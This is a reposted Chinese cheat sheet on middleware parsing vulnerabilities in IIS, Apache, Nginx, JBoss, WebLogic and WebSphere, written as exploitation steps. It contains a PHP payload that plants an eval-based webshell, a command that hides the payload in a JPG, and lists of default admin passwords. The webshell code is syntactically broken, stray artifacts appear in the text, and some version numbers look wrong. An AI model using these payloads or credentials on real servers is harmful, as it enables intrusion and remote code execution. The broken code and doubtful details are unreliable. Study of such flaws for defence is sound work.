中间件解析漏洞

发布时间:2022-07-05 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了中间件解析漏洞脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

IISIIS解析漏洞IIS 6.0 解析利用方法有两种:1. 目录解析建立xx.asp为名称的文件夹,将asp文件放入,访问/xx.asp/xx.jpg,其中xx.jpg可以为任意文件后缀,即可解析2. 文件解析后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)3. 默认解析:/xx.asa ,/xx.cer,/xx.cdx

IIS7.5/ IIS 7.0/ Nginx <8.03 畸形解析漏洞IIS 7.5 的解析漏洞利用手法,在正常图片URL后添加 /.php常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾内容<?php fputs(foPEn('shell.php','w'),'<?php eval($_POST[cmd]?>');?>通过windows下copy命令合成,或者用hex工具直接写也可以然后访问xx.jpg/x.php,在这个目录下就会生成一句话木马shell.php

测试:图片1.jpg 创建webshell.txt,写入<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]?>');?>在windows下打开cmd,命令为:copy 1.jpg /b + webshell.txt /a 1webshell.jpg访问1webshell.jpg/.php

在当前目录下就生成了一个php文件shell.php

IIS PUT漏洞2 个错误配置造成1.WEB 服务器扩展里设置WebDAV为允许;2. 网站权限配置里开启了写入权限。使用桂林老兵的工具

IIS溢出漏洞开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,针对 Windows Server 2003 R2POC: https://gIThub.COM/edwardz246003 ... b/master/exploit.py

 

 

apache

解析漏洞后缀解析:test.php.x1.x2.x3Apache 将从右至左开始判断后缀,若x3非可识别后缀,再判断x2,直到找到可识别后缀为止,然后将该可识别后缀进解析test.php.x1.x2.x3 则会被解析为php经验之谈:php|phP3|phtML|php4|php5 多可被Apache解析@H_126_24@

 

 

Nginx解析漏洞Nginx <8.03 畸形解析漏洞直接在正常图片URL后添加 /.phpNginx <=0.8.37在Fast-CGI关闭的情况下,Nginx <=0.8.37 依然存在解析漏洞在一个文件路径(/xx.jpg)后面加上%00.php会将 /xx.jpg%00.php 解析为 php 文件。这是从 /test.jpg/x.php 演变过来的,具体可以参考:Ngnix空字节可远程执行代码漏洞

 

 

JBOSS存在java反序列化命令执行端口:8080(Web)、9990(Console)管理面板:http://<host>:9990弱口令jboss:jbossadmin:admin

 

 

Weblogic存在java反序列化命令执行端口 7001、7002(Web、Console)管理面板:http://<host>:7001/console/弱口令webLOGic:weblogicSystem:systemportaladmin:portaladminguest:guestweblogic:admin123weblogic:weblogic123

 

 

WebSphere存在java反序列化命令执行端口:9080、9443(Web)、9060、9043(Console)、…管理面板:http://<host>:7043/ibm/console/logon.jsp

脚本宝典总结

以上是脚本宝典为你收集整理的中间件解析漏洞全部内容,希望文章能够帮你解决中间件解析漏洞所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。